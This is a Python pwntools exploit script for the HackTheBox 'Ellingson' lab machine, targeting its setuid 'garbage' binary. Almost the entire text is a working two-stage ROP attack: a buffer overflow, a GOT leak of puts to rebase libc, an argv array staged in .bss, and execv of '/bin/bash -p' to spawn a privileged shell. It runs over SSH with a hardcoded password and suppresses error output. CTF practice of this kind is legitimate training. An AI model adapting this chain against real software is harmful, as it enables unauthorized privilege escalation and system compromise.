Garbage - Exploiting | Ellingson privilege escalation, HackTheBox
"""Exploit script for the HackTheBox "Ellingson" machine (target binary: garbage).

Two-stage ROP chain against ./garbage. Stage one overflows the password
buffer, leaks puts@GLIBC through the GOT, reads an argv array into .bss
with gets() and returns into main. Stage two overflows again and calls
execv() from the leaked libc with that array. Runs against a local
process when LOCAL is True, otherwise over an SSH session to HOST.

NOTE(review): str and bytes are concatenated below (p64(...) + '\x00');
this reads as Python 2-era pwntools code -- confirm before running on 3.x.
"""
import os, sys
from pwn import *

HOST: str = '10.10.10.139'
USER: str = 'margo'
PASS: str = 'iamgod$08'  # NOTE(review): SSH password committed in source -- read it from an env var or prompt instead
LOCAL: bool = False  # True: attach to a local ./garbage process; False: run the binary over SSH

elf = ELF('./garbage')  # target binary; symbols and GOT entries are read from it
context.terminal = ['tmux', 'sp', '-h']
# context.log_level = 'DEBUG'

if LOCAL == True:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6', checksec = False)
    io = process(elf.path, stdin = PTY)
else:
    # libc offsets come from a local copy of the target's libc
    libc = ELF('./libc.so.6', checksec = False)
    # stderr is discarded for the rest of the run, so ssh/pwntools errors are never shown
    f = open('/dev/null', 'w')
    sys.stderr = f
    shell = ssh(USER, HOST, password = PASS)
    io = shell.run('/usr/bin/garbage')

# Stage 1 chain: 136 bytes of padding up to the saved return address, then
# puts(got.puts) to leak a libc pointer, gets(0x404100) to stage data in
# .bss, and a return into main so the overflow can be triggered a second time.
leak = flat(
    'A' * 136,
    0x40179b, # 0x000000000040179b : pop rdi ; ret
    elf.got['puts'],
    elf.sym['puts'],
    0x40179b, # 0x000000000040179b : pop rdi ; ret
    0x404100, # .bss + 48
    elf.sym['gets'],
    0x401016, # 0x0000000000401016 : ret <Alignment>
    0x401619, # .text:0000000000401619 : push rbp (main)
    endianness = 'little', word_size = 64, sign = False)

io.sendlineafter('access password: ', leak)
io.recvuntil('denied.\n')
# the leaked pointer is printed raw by puts(); drop the newline and pad to 8 bytes
leak = u64(io.recvline()[:-1].ljust(8, '\x00'))
libc.address = leak - libc.sym['puts']  # rebase libc on the leaked puts address

log.success('Leaked puts@@GLIBC: ' + hex(leak))
log.info('GLIBC base address: ' + hex(libc.address))
log.info('GLIBC execv address: ' + hex(libc.sym['execv']))

# Data read by gets() into 0x404100: an argv array followed by its strings.
#   +0  pointer to '/bin/bash' (0x404100 + 24)
#   +8  pointer to '-p'        (0x404100 + 34, i.e. 24 + len('/bin/bash\x00'))
#   +16 NULL terminator
#   +24 '/bin/bash\x00-p'
fake_array = ''
fake_array += p64(0x404100 + 24)
fake_array += p64(0x404100 + 34)
fake_array += '\x00' * 8
fake_array += '/bin/bash\x00-p'

sleep(0.5)  # presumably gives the chain time to reach gets() before the line is sent -- verify
io.sendline(fake_array)

# Stage 2 chain: execv(rdi = '/bin/bash' at 0x404100 + 24, rsi = array at 0x404100)
shell = flat(
    'A' * 136,
    0x40179b, # 0x000000000040179b : pop rdi ; ret
    0x404100 + 24, # .bss + 72 ('/bin/bash')
    0x401799, # 0x0000000000401799 : pop rsi ; pop r15 ; ret
    0x404100, # .bss + 48
    'A' * 8, # Junk
    0x401016, # 0x0000000000401016 : ret <Alignment>
    libc.sym['execv'],
    endianness = 'little', word_size = 64, sign = False)

log.progress('Spawning shell...')
io.sendlineafter('access password: ', shell)
io.recv()
io.interactive()
io.close()